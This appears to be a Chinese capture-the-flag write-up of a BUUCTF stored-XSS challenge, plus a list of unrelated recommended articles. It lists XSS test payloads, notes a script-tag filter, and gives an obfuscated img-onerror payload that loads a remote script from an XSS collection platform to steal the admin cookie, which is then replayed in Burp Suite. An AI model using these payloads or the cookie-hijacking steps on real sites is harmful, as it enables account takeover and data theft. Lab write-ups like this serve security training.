61,【1】BUUCTF WEB BUU XSS COURSE 11

进入靶场

左边是吐槽,右边是登录,先登录试试

admin 123456

admiin'# 123456

admin"# 123456

不玩了,先去回顾下xss

回顾完就很尴尬了,我居然用SQL的知识去做xss的题

重来

吐槽这里有一个输入框,容易出现存储型xss漏洞

常见的xss payload如下:

<script>alert(1)</script>

"><script>alert(1)</script><"

<img src=# onerror=alert(1)>

<svg onload=alert(1)>

都试试

1,<script>alert(1)</script>

访问的时候什么都没有,失败

2,"><script>alert(1)</script><"

根据以上两次尝试,知script被过滤了

3,<img src=# onerror=alert(1)>

出现弹窗1,注入成功

进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试

之前没用过,先注册

登录成功

点击左边的创建项目,随便写一个名称

再点击左边的我的项目,右上角的查看配置代码

复制了这个

<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>

但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)

不过得到记录后便会知道backend/admin.php和管理员cookie

出现这个页面是我没改cookie

可是我也不知道cookie呀

改cookie就用BP抓包,发送到重放器,在请求里改

就知道flag了

相关推荐
ttwuai2 分钟前
Go 后台富文本图片上传失败排查:前端限制、接口和存储目录要一起看
前端·golang·状态模式
小雪_Snow3 分钟前
JS 数组的遍历 —— 两种方式详解
前端·javascript
禅思院6 分钟前
AI对话前端从入门到崩溃:一个长对话引发的五层优化战争【五】
前端·架构·前端框架
狂师7 分钟前
测试人员必备:推荐一款智能测试数据清理AI Skill,支持db、redis、mq等
数据库·aigc·测试
kyle~18 分钟前
前端---Zustand组件库(轻量快速精细化的状态管理方案)
前端
IT_陈寒19 分钟前
为什么我的React状态更新总是不按套路出牌?
前端·人工智能·后端
疯狂打码的少年35 分钟前
【软件工程】需求工程:需求获取与需求分析
数据库·笔记·软件工程·需求分析
Database_Cool_36 分钟前
阿里云 PolarDB-X vs TiDB 分布式数据库选型指南
数据库·分布式·阿里云·tidb
数据库小学妹37 分钟前
分布式数据库架构怎么选?三种路线对比+迁移避坑指南
数据库·分布式·分布式数据库·数据库架构·数据迁移·数据库选型
恋猫de小郭40 分钟前
Fluter 共享内存多线程正在落地,IsolateGroupBound 来了
android·前端·flutter